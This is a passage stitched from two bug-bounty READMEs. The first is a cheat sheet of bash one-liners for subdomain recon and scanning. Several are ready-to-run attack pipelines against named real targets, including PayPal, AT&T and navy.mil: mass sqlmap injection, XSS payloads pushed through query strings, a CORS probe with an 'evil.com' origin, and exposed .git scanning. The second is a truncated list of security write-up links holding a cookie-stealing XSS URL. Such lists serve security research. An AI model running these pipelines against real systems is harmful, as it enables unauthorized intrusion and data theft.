then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null" ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash tac hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
## Awesome Security Write-Ups and POCs > A curated list of delightful writeups and POCs #### Not mine not yours, It's everyone's. Feel free to contribute. ![hacking-resource](https://github.com/dhaval17/hacking-resources/raw/assets/images/hacker.jpg) #### Submitting new resource : Please read the [Contribution Doc](/contribution.md) #### Content 1. [Cross Site Scripting - XSS](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#cross-site-scripting---xss) 2. [Cross Site Request Frogery - CSRF](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#cross-site-request-frogery---csrf) 3. [Server Side Request Frogery - SSRF](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#server-side-request-frogery---ssrf) 4. [Application/Business Logic](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#applicationbusiness-logic) 5. [SQL Injection - SQLi](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#sql-injection---sqli) 6. [InDirect Object Reference - IDOR](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#indirect-object-reference---idor) 7. [Code Execution](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#code-execution) 8. [Reverse Engineering](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#reverse-engineering) 9. [DNS Related](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#dns-related) 10. [Brute-force](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#brute-force) 11. [Subdomain Takeover](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#subdomain-takeover) 12. [Open URL Redirection](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#open-url-redirection) 13. [Research Papers](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#research-papers) 14. [Miscellaneous](https://github.com/dhaval17/awesome-writeups/blob/master/README.md#miscellaneous) #### Resource ##### Blogs/Write ups ###### Cross Site Scripting - XSS 1. [ XSS that existed at accounts.google.com](http://masatokinugawa.l0.cm/2013/06/accounts.google.com-utf-32-xss.html) - [@kinugawamasato](https://twitter.com/kinugawamasato) 2. [admin.google.com Reflected Cross-Site Scripting (XSS)](https://buer.haus/2015/01/21/admin-google-com-reflected-cross-site-scripting-xss/) - [@bbuerhaus](https://twitter.com/bbuerhaus) - Vulnerable `continue` parameter, `https://admin.google.com/mrzioto.com/ServiceNotAllowed?service=grandcentral&continue=javascript:alert(document.cookie);//` 3. [XSS-es in Google Caja](http://blog.bentkowski.info/2016/07/xss-es-in-google-caja.html) - [@SecurityMB](https://twitter.com/SecurityMB) 4. [Content Types and XSS: Facebook Studio](https://whitton.io/articles/content-types-and-xss-facebook-studio/) - [@fin1te](https://twitter.com/fin1te) - Client-side validation for content-type, Which then enables to pass `HTML/Javascript` to execute XSS 5. [Facebook XSS via Cross-Origin Resource Sharing](http://maustin.net/2010/07/06/facebook_html5.html) - [@mattaustin](https://twitter.com/mattaustin) 6. [Stored XSS at Parse](https://dr4cun0.com/blog/stored-xss-at-parse/) - [Dhaval](https://twitter.com/17haval) - No URL validation, Thus allowing `javascript:alert(1)` in URL parameter leading to XSS 7. [XSS in OAuth flow of Paypal](https://dr4cun0.com/blog/xss_in_oauth_flow_of_paypal-2/) - [Dhaval](https://twitter.com/17haval) 8. [Reflected XSS through AngularJS sandbox bypass...McDonald](https://finnwea.com/blog/stealing-passwords-from-mcdonalds-users) - [@finnwea](https://twitter.com/finnwea) 9. [Coming across an XSS vulnerability at Google sites is wrong I expected](http://nootropic.me/blog/en/blog/2016/09/20/%E3%82%84%E3%81%AF%E3%82%8A%E3%83%8D%E3%83%83%E3%83%88%E3%82%B5%E3%83%BC%E3%83%95%E3%82%A3%E3%83%B3%E3%82%92%E3%81%97%E3%81%A6%E3%81%84%E3%81%9F%E3%82%89%E3%81%9F%E3%81%BE%E3%81%9F%E3%81%BEgoogle/) - [ikuta_T](#) 10. [Hacking Google for fun and profit](https://introvertmac.wordpress.com/2016/07/30/hacking-google-for-fun-and-profit/#more-327) - [Manish Bhattacharya](https://twitter.com/UMeNMactech) 11. [Unpatched (0day) jQuery Mobile XSS](http://sirdarckcat.blogspot.in/2017/02/unpatched-0day-jquery-mobile-xss.html) - [EDUARDO VELA](https://twitter.com/sirdarckcat) 12. [Reflected XSS in Etsy](http://hmgmakarovich.blogspot.in/2017_01_01_archive.html) - [Harry M Gertos](http://hmgmakarovich.blogspot.in) 13. [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) - [Patrik Fehrenbach ](https://twitter.com/ITSecurityguard) 14. [admin.google.com Reflected Cross-Site Scripting (XSS)](https://buer.haus/2015/01/21/admin-google-com-reflected-cross-site-scripting-xss/) - [Brett Buerhaus](https://twitter.com/bbuerhaus) 15. [Stored XSS at exchange.onavo.com](https://dr4cun0.com/blog/stored-xss-at-exchange-onavo-com/) - [Dhaval](https://twitter.com/17haval) 16. [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) - [Brett Buerhaus](https://twitter.com/bbuerhaus) 17. [How I found a $5,000 Google Maps XSS](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff) - [Marin Moulinier](#) ###### Cross Origin Resource Sharing Exploitation 1. [Think Outside the Scope: Advanced CORS Exploitation Techniques](https://medium.com/@sandh0t/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) - [Sandh0t](#) ###### Cross Site Request Frogery - CSRF 1. [Messenger.com Site-Wide CSRF](https://whitton.io/articles/messenger-site-wide-csrf/) - [@fin1te](https://twitter.com/fin1te) 2. [How I bypassed Facebook CSRF once again!](http://blog.darabi.me/2016/05/how-i-bypassed-facebook-csrf-in-2016.html) - [Pouya Darabi](https://twitter.com/Pouyadarabi) ###### Server Side Request Frogery - SSRF 1. [SSRF at Facebook Update Subscription Menu](https://dr4cun0.com/blog/ssrf-at-update-subscription-menu/) - [Dhaval](https://twitter.com/17haval) 2. [Ok Google, Give Me All Your Internal DNS Information](https://www.rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/) - [Julien Ahrens ](https://twitter.com/mrtuxracer) 3. [How anyone could have used Uber to ride for free! ](http://www.anandpraka.sh/2017/03/how-anyone-could-have-used-uber-to-ride.html) - ###### Application/Business Logic 1. [Facebook Simple Technical Bug worth 7500$](http://ashishpadelkar.com/index.php/2015/09/23/facebook-simple-technical-bug-worth-7500/) - [Ashish Padelkar](https://twitter.com/ashish_padelkar) 2. [How I Could Steal Money from Instagram, Google and Microsoft](https://www.arneswinnen.net/2016/07/how-i-could-steal-money-from-instagram-google-and-microsoft/) - [Arne Swinnen](https://twitter.com/arneswinnen) ###### SQL Injection - SQLi 1. [Popping a shell on the Oculus developer portal](https://bitquark.co.uk/blog/2014/08/31/popping_a_shell_on_the_oculus_developer_portal) - [Bitquark](https://twitter.com/Bitquark) 2. [SQLi + XXE + File path traversal Deutsche Telekom](https://www.ibrahim-elsayed.com/?p=150) - [Ibrahim M. El-Sayed](https://twitter.com/ibrahim_mosaad) 3. [GitHub Enterprise SQL Injection](http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html) - [Orange Tsai](#) ###### InDirect Object Reference - IDOR 1. [Facebook Vulnerability - Delete Any Video on Facebook](http://danmelamed.blogspot.in/2017/01/facebook-vulnerability-delete-any-video.html) - [Dan Melamed](https://twitter.com/danmelamed) 2. [Confirming new email/mobile number bug in Facebook](https://youtu.be/4euBQCMxlE8) - [Lokesh Kumar](#) 3. [How I hacked 62.5 million Zomato Users](http://www.anandpraka.sh/2015/06/how-i-hacked-zomatocom-to-see-data-of.html) - [Anand Prakash](https://twitter.com/sehacure) - [Anand Prakash](https://twitter.com/sehacure) ###### Code Execution 1. [Facebook’s ImageTragick Story](http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html) - [@4lemon](https://twitter.com/4lemon) 2. [WD My Cloud Mirror 2.11.153 RCE and Authentication Bypass](https://security.szurek.pl/wd-my-cloud-mirror-211153-rce-and-authentication-bypass.html) - [Kacper Szurek](https://twitter.com/kacperszurek) 3. [0day writeup: XXE in uber.com](https://httpsonly.blogspot.in/2017/01/0day-writeup-xxe-in-ubercom.html) - [Vladimir Ivanov](https://twitter.com/httpsonly) 4. [Command injection which got me "6000$" from #Google](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) - [S Venkatesh](http://www.pranav-venkat.com) 5. [Airbnb – Ruby on Rails String Interpolation led to Remote Code Execution](http://buer.haus/2017/03/13/airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/) - [Ben Sadeghipour Brett Buerhaus](#) 6.[GitHub Enterprise Remote Code Execution](http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html) - [Markus Fenske](#) 7. [Escaping from Restricted Shell and Gaining Root Access](https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/) - [Mehmet Ince](#) 8. [GitHub Enterprise Remote Code Execution](https://www.exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html) ###### Reverse Engineering 1. [Unfolding obfuscated code with Reven (part 1)](http://blog.tetrane.com/2016/11/reversing-f4b-challenge-part1.html) 2. [Unfolding obfuscated code with Reven (part 2)](http://blog.tetrane.com/2016/11/reversing-f4b-challenge-part2.html) 3. [Three roads lead to Rome](http://blogs.360.cn/360safe/2016/11/29/three-roads-lead-to-rome-2/) - [Luke Viruswalker](#) ###### DNS Related 1. [Hijacking Broken Nameservers to Compromise Your Target](https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/) - [@IAmMandatory](https://twitter.com/IAmMandatory) 2. [That (.) Which Made The Difference](https://dr4cun0.com/blog/that-which-made-the-difference/) - [Dhaval](https://twitter.com/17haval) 3. [Domain Fronting Via Cloudfront Alternate Domains](https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/) - [Vincent Yiu](https://twitter.com/vysecurity) ###### Brute-force 1. [How I could have hacked all Facebook accounts](http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html) - [Anand Prakash](https://twitter.com/sehacure) ###### Subdomain Takeover 1. [Hijacking tons of Instapage expired users Domains & Subdomains](http://www.geekboy.ninja/blog/tag/hackerone-subdomain-takeover) - [@emgeekboy](https://twitter.com/emgeekboy) 2. [The story of EV-SSL, AWS and trailing dot domains](https://labs.detectify.com/2016/10/05/the-story-of-ev-ssl-aws-and-trailing-dot-domains/) - [Detectify](https://twitter.com/detectify) ###### Open URL Redirection 1. [How I discovered a 1000$ open redirect in Facebook](http://yassineaboukir.com/blog/how-i-discovered-a-1000-open-redirect-in-facebook/) - [Yassine Aboukir](https://twitter.com/Yassineaboukir) 2. [Facebook Whitehat Vulnerability for 2013: Open Redirection in Facebook Mobile](https://prakharprasad.com/facebook-whitehat-vulnerability-for-2013-open-redirection-in-facebook-mobile/) - [Prakhar Prasad](https://twitter.com/prakharprasad) 3. [Dropbox Team Website Open Redirection](https://prakharprasad.com/dropbox-team-website-open-redirection/) - [Prakhar Prasad](https://twitter.com/prakharprasad) 4. [Bypassing SoundCloud’s protection for open redirections](https://strukt93.wordpress.com/2017/03/09/bypassing-soundclouds-protection-for-open-redirections/) - [strukt93](#) ###### Research Papers 1. [The Complete Guide to CORS (In)Security](https://www.bedefended.com/papers/cors-security-guide) - [Davide Danelon](https://twitter.com/@TwiceDi) ###### Miscellaneous 1. [Combining host header injection and lax host parsing serving malicious data](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - [Detectify](https://twitter.com/detectify) 2. [Compromising Apache Tomcat via JMX access](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/february/compromising-apache-tomcat-via-jmx-access/) - [NCC Group UK](#) 3. [Facebook's Bug - Unauthorized access to credit/prepaid card details](https://pranavhivarekar.in/2017/02/11/facebooks-bug-unauthorized-access-to-credit-card-details-limited-of-any-user/) - [Pranav Hivarekar](https://twitter.com/HivarekarPranav) 4. [Constructing an XSS vector, using no letters](https://inventropy.us/blog/constructing-an-xss-vector-using-no-letters) - [Charles Neill](https://twitter.com/ccneill) 5. [Order Facebook Friends by Facebook Recruiting Technical Coefficient](http://philippeharewood.com/order-facebook-friends-by-facebook-recruiting-technical-coefficient/) - [Philippe Harewood](https://twitter.com/phwd) 6. [Web Cache Deception Attack](http://omergil.blogspot.in/2017/02/web-cache-deception-attack.html) - [Omer Gil](https://twitter.com/omer_gil) 7. [Hacking Slack using 